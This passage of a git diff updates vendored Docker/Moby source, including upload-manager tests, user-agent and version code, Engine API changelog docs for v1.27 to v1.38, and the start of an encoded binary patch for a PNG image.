maxUploadConcurrency = 3 @@ -79,7 +79,7 @@ func uploadDescriptors(currentUploads *int32) []UploadDescriptor { } func TestSuccessfulUpload(t *testing.T) { - lum := NewLayerUploadManager(maxUploadConcurrency) + lum := NewLayerUploadManager(maxUploadConcurrency, func(m *LayerUploadManager) { m.waitDuration = time.Millisecond }) progressChan := make(chan progress.Progress) progressDone := make(chan struct{}) @@ -105,7 +105,7 @@ func TestSuccessfulUpload(t *testing.T) { } func TestCancelledUpload(t *testing.T) { - lum := NewLayerUploadManager(maxUploadConcurrency) + lum := NewLayerUploadManager(maxUploadConcurrency, func(m *LayerUploadManager) { m.waitDuration = time.Millisecond }) progressChan := make(chan progress.Progress) progressDone := make(chan struct{}) diff --git a/vendor/github.com/docker/docker/dockerversion/useragent.go b/vendor/github.com/docker/docker/dockerversion/useragent.go index d2a891c4d6..2eceb6fa9e 100644 --- a/vendor/github.com/docker/docker/dockerversion/useragent.go +++ b/vendor/github.com/docker/docker/dockerversion/useragent.go @@ -1,15 +1,17 @@ -package dockerversion +package dockerversion // import "github.com/docker/docker/dockerversion" import ( + "context" "fmt" "runtime" - "github.com/docker/docker/api/server/httputils" "github.com/docker/docker/pkg/parsers/kernel" "github.com/docker/docker/pkg/useragent" - "golang.org/x/net/context" ) +// UAStringKey is used as key type for user-agent string in net/context struct +const UAStringKey = "upstream-user-agent" + // DockerUserAgent is the User-Agent the Docker client uses to identify itself. 
// In accordance with RFC 7231 (5.5.3) is of the form: // [docker client's UA] UpstreamClient([upstream client's UA]) @@ -37,9 +39,9 @@ func DockerUserAgent(ctx context.Context) string { func getUserAgentFromContext(ctx context.Context) string { var upstreamUA string if ctx != nil { - var ki interface{} = ctx.Value(httputils.UAStringKey) + var ki interface{} = ctx.Value(UAStringKey) if ki != nil { - upstreamUA = ctx.Value(httputils.UAStringKey).(string) + upstreamUA = ctx.Value(UAStringKey).(string) } } return upstreamUA @@ -50,8 +52,8 @@ func escapeStr(s string, charsToEscape string) string { var ret string for _, currRune := range s { appended := false - for _, escapeableRune := range charsToEscape { - if currRune == escapeableRune { + for _, escapableRune := range charsToEscape { + if currRune == escapableRune { ret += `\` + string(currRune) appended = true break diff --git a/vendor/github.com/docker/docker/dockerversion/version_lib.go b/vendor/github.com/docker/docker/dockerversion/version_lib.go index 33f77d3ce6..0897c0728e 100644 --- a/vendor/github.com/docker/docker/dockerversion/version_lib.go +++ b/vendor/github.com/docker/docker/dockerversion/version_lib.go @@ -1,16 +1,17 @@ // +build !autogen // Package dockerversion is auto-generated at build-time -package dockerversion +package dockerversion // import "github.com/docker/docker/dockerversion" // Default build-time variable for library-import. // This file is overridden on build with build-time informations. 
const ( - GitCommit string = "library-import" - Version string = "library-import" - BuildTime string = "library-import" - IAmStatic string = "library-import" - ContainerdCommitID string = "library-import" - RuncCommitID string = "library-import" - InitCommitID string = "library-import" + GitCommit = "library-import" + Version = "library-import" + BuildTime = "library-import" + IAmStatic = "library-import" + ContainerdCommitID = "library-import" + RuncCommitID = "library-import" + InitCommitID = "library-import" + PlatformName = "" ) diff --git a/vendor/github.com/docker/docker/docs/README.md b/vendor/github.com/docker/docker/docs/README.md deleted file mode 100644 index da93093075..0000000000 --- a/vendor/github.com/docker/docker/docs/README.md +++ /dev/null @@ -1,30 +0,0 @@ -# The non-reference docs have been moved! - - - -The documentation for Docker Engine has been merged into -[the general documentation repo](https://github.com/docker/docker.github.io). - -See the [README](https://github.com/docker/docker.github.io/blob/master/README.md) -for instructions on contributing to and building the documentation. - -If you'd like to edit the current published version of the Engine docs, -do it in the master branch here: -https://github.com/docker/docker.github.io/tree/master/engine - -If you need to document the functionality of an upcoming Engine release, -use the `vnext-engine` branch: -https://github.com/docker/docker.github.io/tree/vnext-engine/engine - -The reference docs have been left in docker/docker (this repo), which remains -the place to edit them. - -The docs in the general repo are open-source and we appreciate -your feedback and pull requests! 
diff --git a/vendor/github.com/docker/docker/docs/api/v1.18.md b/vendor/github.com/docker/docker/docs/api/v1.18.md index 0db0c0f916..327701427a 100644 --- a/vendor/github.com/docker/docker/docs/api/v1.18.md +++ b/vendor/github.com/docker/docker/docs/api/v1.18.md @@ -7,8 +7,8 @@ redirect_from: - /reference/api/docker_remote_api_v1.18/ --- - +## V1.38 API changes + +[Docker Engine API v1.38](https://docs.docker.com/engine/api/v1.38/) documentation + + +* `GET /tasks` and `GET /tasks/{id}` now return a `NetworkAttachmentSpec` field, + containing the `ContainerID` for non-service containers connected to "attachable" + swarm-scoped networks. + +## v1.37 API changes + +[Docker Engine API v1.37](https://docs.docker.com/engine/api/v1.37/) documentation + +* `POST /containers/create` and `POST /services/create` now supports exposing SCTP ports. +* `POST /configs/create` and `POST /configs/{id}/create` now accept a `Templating` driver. +* `GET /configs` and `GET /configs/{id}` now return the `Templating` driver of the config. +* `POST /secrets/create` and `POST /secrets/{id}/create` now accept a `Templating` driver. +* `GET /secrets` and `GET /secrets/{id}` now return the `Templating` driver of the secret. + +## v1.36 API changes + +[Docker Engine API v1.36](https://docs.docker.com/engine/api/v1.36/) documentation + +* `Get /events` now return `exec_die` event when an exec process terminates. + + +## v1.35 API changes + +[Docker Engine API v1.35](https://docs.docker.com/engine/api/v1.35/) documentation + +* `POST /services/create` and `POST /services/(id)/update` now accepts an + `Isolation` field on container spec to set the Isolation technology of the + containers running the service (`default`, `process`, or `hyperv`). This + configuration is only used for Windows containers. +* `GET /containers/(name)/logs` now supports an additional query parameter: `until`, + which returns log lines that occurred before the specified timestamp. 
+* `POST /containers/{id}/exec` now accepts a `WorkingDir` property to set the + work-dir for the exec process, independent of the container's work-dir. +* `Get /version` now returns a `Platform.Name` field, which can be used by products + using Moby as a foundation to return information about the platform. +* `Get /version` now returns a `Components` field, which can be used to return + information about the components used. Information about the engine itself is + now included as a "Component" version, and contains all information from the + top-level `Version`, `GitCommit`, `APIVersion`, `MinAPIVersion`, `GoVersion`, + `Os`, `Arch`, `BuildTime`, `KernelVersion`, and `Experimental` fields. Going + forward, the information from the `Components` section is preferred over their + top-level counterparts. + + +## v1.34 API changes + +[Docker Engine API v1.34](https://docs.docker.com/engine/api/v1.34/) documentation + +* `POST /containers/(name)/wait?condition=removed` now also also returns + in case of container removal failure. A pointer to a structure named + `Error` added to the response JSON in order to indicate a failure. + If `Error` is `null`, container removal has succeeded, otherwise + the test of an error message indicating why container removal has failed + is available from `Error.Message` field. + +## v1.33 API changes + +[Docker Engine API v1.33](https://docs.docker.com/engine/api/v1.33/) documentation + +* `GET /events` now supports filtering 4 more kinds of events: `config`, `node`, +`secret` and `service`. + +## v1.32 API changes + +[Docker Engine API v1.32](https://docs.docker.com/engine/api/v1.32/) documentation + +* `POST /containers/create` now accepts additional values for the + `HostConfig.IpcMode` property. New values are `private`, `shareable`, + and `none`. +* `DELETE /networks/{id or name}` fixed issue where a `name` equal to another + network's name was able to mask that `id`. 
If both a network with the given + _name_ exists, and a network with the given _id_, the network with the given + _id_ is now deleted. This change is not versioned, and affects all API versions + if the daemon has this patch. + +## v1.31 API changes + +[Docker Engine API v1.31](https://docs.docker.com/engine/api/v1.31/) documentation + +* `DELETE /secrets/(name)` now returns status code 404 instead of 500 when the secret does not exist. +* `POST /secrets/create` now returns status code 409 instead of 500 when creating an already existing secret. +* `POST /secrets/create` now accepts a `Driver` struct, allowing the + `Name` and driver-specific `Options` to be passed to store a secrets + in an external secrets store. The `Driver` property can be omitted + if the default (internal) secrets store is used. +* `GET /secrets/(id)` and `GET /secrets` now return a `Driver` struct, + containing the `Name` and driver-specific `Options` of the external + secrets store used to store the secret. The `Driver` property is + omitted if no external store is used. +* `POST /secrets/(name)/update` now returns status code 400 instead of 500 when updating a secret's content which is not the labels. +* `POST /nodes/(name)/update` now returns status code 400 instead of 500 when demoting last node fails. +* `GET /networks/(id or name)` now takes an optional query parameter `scope` that will filter the network based on the scope (`local`, `swarm`, or `global`). +* `POST /session` is a new endpoint that can be used for running interactive long-running protocols between client and + the daemon. This endpoint is experimental and only available if the daemon is started with experimental features + enabled. +* `GET /images/(name)/get` now includes an `ImageMetadata` field which contains image metadata that is local to the engine and not part of the image config. 
+* `POST /services/create` now accepts a `PluginSpec` when `TaskTemplate.Runtime` is set to `plugin` +* `GET /events` now supports config events `create`, `update` and `remove` that are emitted when users create, update or remove a config +* `GET /volumes/` and `GET /volumes/{name}` now return a `CreatedAt` field, + containing the date/time the volume was created. This field is omitted if the + creation date/time for the volume is unknown. For volumes with scope "global", + this field represents the creation date/time of the local _instance_ of the + volume, which may differ from instances of the same volume on different nodes. +* `GET /system/df` now returns a `CreatedAt` field for `Volumes`. Refer to the + `/volumes/` endpoint for a description of this field. + +## v1.30 API changes + +[Docker Engine API v1.30](https://docs.docker.com/engine/api/v1.30/) documentation + +* `GET /info` now returns the list of supported logging drivers, including plugins. +* `GET /info` and `GET /swarm` now returns the cluster-wide swarm CA info if the node is in a swarm: the cluster root CA certificate, and the cluster TLS + leaf certificate issuer's subject and public key. It also displays the desired CA signing certificate, if any was provided as part of the spec. +* `POST /build/` now (when not silent) produces an `Aux` message in the JSON output stream with payload `types.BuildResult` for each image produced. The final such message will reference the image resulting from the build. +* `GET /nodes` and `GET /nodes/{id}` now returns additional information about swarm TLS info if the node is part of a swarm: the trusted root CA, and the + issuer's subject and public key. +* `GET /distribution/(name)/json` is a new endpoint that returns a JSON output stream with payload `types.DistributionInspect` for an image name. It includes a descriptor with the digest, and supported platforms retrieved from directly contacting the registry. 
+* `POST /swarm/update` now accepts 3 additional parameters as part of the swarm spec's CA configuration; the desired CA certificate for + the swarm, the desired CA key for the swarm (if not using an external certificate), and an optional parameter to force swarm to + generate and rotate to a new CA certificate/key pair. +* `POST /service/create` and `POST /services/(id or name)/update` now take the field `Platforms` as part of the service `Placement`, allowing to specify platforms supported by the service. +* `POST /containers/(name)/wait` now accepts a `condition` query parameter to indicate which state change condition to wait for. Also, response headers are now returned immediately to acknowledge that the server has registered a wait callback for the client. +* `POST /swarm/init` now accepts a `DataPathAddr` property to set the IP-address or network interface to use for data traffic +* `POST /swarm/join` now accepts a `DataPathAddr` property to set the IP-address or network interface to use for data traffic +* `GET /events` now supports service, node and secret events which are emitted when users create, update and remove service, node and secret +* `GET /events` now supports network remove event which is emitted when users remove a swarm scoped network +* `GET /events` now supports a filter type `scope` in which supported value could be swarm and local + +## v1.29 API changes + +[Docker Engine API v1.29](https://docs.docker.com/engine/api/v1.29/) documentation + +* `DELETE /networks/(name)` now allows to remove the ingress network, the one used to provide the routing-mesh. +* `POST /networks/create` now supports creating the ingress network, by specifying an `Ingress` boolean field. As of now this is supported only when using the overlay network driver. +* `GET /networks/(name)` now returns an `Ingress` field showing whether the network is the ingress one. 
+* `GET /networks/` now supports a `scope` filter to filter networks based on the network mode (`swarm`, `global`, or `local`). +* `POST /containers/create`, `POST /service/create` and `POST /services/(id or name)/update` now takes the field `StartPeriod` as a part of the `HealthConfig` allowing for specification of a period during which the container should not be considered unhealthy even if health checks do not pass. +* `GET /services/(id)` now accepts an `insertDefaults` query-parameter to merge default values into the service inspect output. +* `POST /containers/prune`, `POST /images/prune`, `POST /volumes/prune`, and `POST /networks/prune` now support a `label` filter to filter containers, images, volumes, or networks based on the label. The format of the label filter could be `label=`/`label==` to remove those with the specified labels, or `label!=`/`label!==` to remove those without the specified labels. +* `POST /services/create` now accepts `Privileges` as part of `ContainerSpec`. Privileges currently include + `CredentialSpec` and `SELinuxContext`. + +## v1.28 API changes + +[Docker Engine API v1.28](https://docs.docker.com/engine/api/v1.28/) documentation + +* `POST /containers/create` now includes a `Consistency` field to specify the consistency level for each `Mount`, with possible values `default`, `consistent`, `cached`, or `delegated`. +* `GET /containers/create` now takes a `DeviceCgroupRules` field in `HostConfig` allowing to set custom device cgroup rules for the created container. +* Optional query parameter `verbose` for `GET /networks/(id or name)` will now list all services with all the tasks, including the non-local tasks on the given network. +* `GET /containers/(id or name)/attach/ws` now returns WebSocket in binary frame format for API version >= v1.28, and returns WebSocket in text frame format for API version< v1.28, for the purpose of backward-compatibility. 
+* `GET /networks` is optimised only to return list of all networks and network specific information. List of all containers attached to a specific network is removed from this API and is only available using the network specific `GET /networks/{network-id}`.
+* `GET /containers/json` now supports `publish` and `expose` filters to filter containers that expose or publish certain ports.
+* `POST /services/create` and `POST /services/(id or name)/update` now accept the `ReadOnly` parameter, which mounts the container's root filesystem as read only.
+* `POST /build` now accepts `extrahosts` parameter to specify a host to ip mapping to use during the build.
+* `POST /services/create` and `POST /services/(id or name)/update` now accept a `rollback` value for `FailureAction`.
+* `POST /services/create` and `POST /services/(id or name)/update` now accept an optional `RollbackConfig` object which specifies rollback options.
+* `GET /services` now supports a `mode` filter to filter services based on the service mode (either `global` or `replicated`).
+* `POST /containers/(name)/update` now supports updating `NanoCPUs` that represents CPU quota in units of 10<sup>-9</sup> CPUs.
+
+## v1.27 API changes
+
+[Docker Engine API v1.27](https://docs.docker.com/engine/api/v1.27/) documentation
+
+* `GET /containers/(id or name)/stats` now includes an `online_cpus` field in both `precpu_stats` and `cpu_stats`. If this field is `nil` then for compatibility with older daemons the length of the corresponding `cpu_usage.percpu_usage` array should be used.
+
 ## v1.26 API changes
 
 [Docker Engine API v1.26](https://docs.docker.com/engine/api/v1.26/) documentation
@@ -83,6 +253,11 @@ keywords: "API, Docker, rcli, REST, documentation"
 * `DELETE /secrets/{id}` removes the secret `id`.
 * `GET /secrets/{id}` returns information on the secret `id`.
 * `POST /secrets/{id}/update` updates the secret `id`.
+* `POST /services/(id or name)/update` now accepts service name or prefix of service id as a parameter.
+* `POST /containers/create` added 2 built-in log-opts that work on all logging drivers, + `mode` (`blocking`|`non-blocking`), and `max-buffer-size` (e.g. `2m`) which enables a non-blocking log buffer. +* `POST /containers/create` now takes `HostConfig.Init` field to run an init + inside the container that forwards signals and reaps processes. ## v1.24 API changes diff --git a/vendor/github.com/docker/docker/docs/contributing/README.md b/vendor/github.com/docker/docker/docs/contributing/README.md new file mode 100644 index 0000000000..915c0cff1e --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/README.md @@ -0,0 +1,8 @@ +### Get set up for Moby development + + * [README first](who-written-for.md) + * [Get the required software](software-required.md) + * [Set up for development on Windows](software-req-win.md) + * [Configure Git for contributing](set-up-git.md) + * [Work with a development container](set-up-dev-env.md) + * [Run tests and test documentation](test.md) diff --git a/vendor/github.com/docker/docker/docs/contributing/images/branch-sig.png b/vendor/github.com/docker/docker/docs/contributing/images/branch-sig.png new file mode 100644 index 0000000000000000000000000000000000000000..b069319eeeb7efa7c3f00b5b9d080ce83ffc6654 GIT binary patch literal 56537 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 
